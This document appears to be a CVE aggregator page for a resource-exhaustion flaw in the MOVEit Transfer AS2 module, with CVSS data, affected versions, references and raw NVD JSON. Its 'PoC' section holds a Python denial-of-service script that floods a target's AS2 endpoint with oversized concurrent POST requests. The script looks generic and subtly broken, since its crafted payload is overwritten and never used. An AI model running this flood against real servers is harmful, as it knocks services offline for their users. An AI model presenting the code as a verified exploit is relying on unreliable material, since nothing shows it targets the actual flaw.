CVE-2025-10932

Description

Uncontrolled Resource Consumption vulnerability in Progress MOVEit Transfer (AS2 module).This issue affects MOVEit Transfer: from 2025.0.0 before 2025.0.3, from 2024.1.0 before 2024.1.7, from 2023.1.0 before 2023.1.16.

CVSS Details

CVSS Score

8.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H

Configurations (Affected Products)

No configuration data available.

MOVEit Transfer 2025.0.0 - 2025.0.2 (需升级到2025.0.3或更高版本)

MOVEit Transfer 2024.1.0 - 2024.1.6 (需升级到2024.1.7或更高版本)

MOVEit Transfer 2023.1.0 - 2023.1.15 (需升级到2023.1.16或更高版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-10932 PoC - MOVEit Transfer AS2 Resource Consumption # This PoC demonstrates sending large AS2 messages to trigger resource exhaustion import requests import time import threading TARGET_URL = "https://target-server/moveit/as2/Receive.aspx" def send_large_as2_message(message_size_mb=50): """Send oversized AS2 message to trigger resource consumption""" headers = { 'Content-Type': 'application/EDIFACT', 'AS2-Version': '1.2', 'AS2-From': 'ATTACKER_PARTNER', 'AS2-To': 'VICTIM_PARTNER', 'Message-ID': '[email protected]', 'Content-Transfer-Encoding': 'binary' } # Generate large payload to exhaust server resources large_payload = b'UNB+UNOC:3+SENDER:ZZ+RECEIVER:ZZ+{}+UNB++EDIINT' timestamp = time.strftime('%Y%m%d%H%M%S') large_payload = (timestamp + '++EANCOM').encode() * (message_size_mb * 1024) try: response = requests.post( TARGET_URL, headers=headers, data=large_payload, timeout=30, verify=False ) return response.status_code except requests.exceptions.RequestException as e: return str(e) def concurrent_attack(num_threads=10, message_size=50): """Launch concurrent attacks from multiple threads""" threads = [] for i in range(num_threads): t = threading.Thread( target=send_large_as2_message, args=(message_size,) ) threads.append(t) t.start() for t in threads: t.join() if __name__ == '__main__': print("Starting CVE-2025-10932 PoC...") print(f"Target: {TARGET_URL}") concurrent_attack(num_threads=5, message_size=100) print("Attack completed. Check server availability.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-10932
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-10932
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-10932/
[4] VulDB https://vuldb.com/cve/CVE-2025-10932
[5] https://community.progress.com/s/article/MOVEit-Transfer-Vulnerability-CVE-2025-10932-October-29-2025

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-10932", "sourceIdentifier": "[email protected]", "published": "2025-10-29T15:15:41.227", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Uncontrolled Resource Consumption vulnerability in Progress MOVEit Transfer (AS2 module).This issue affects MOVEit Transfer: from 2025.0.0 before 2025.0.3, from 2024.1.0 before 2024.1.7, from 2023.1.0 before 2023.1.16."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "references": [{"url": "https://community.progress.com/s/article/MOVEit-Transfer-Vulnerability-CVE-2025-10932-October-29-2025", "source": "[email protected]"}]}}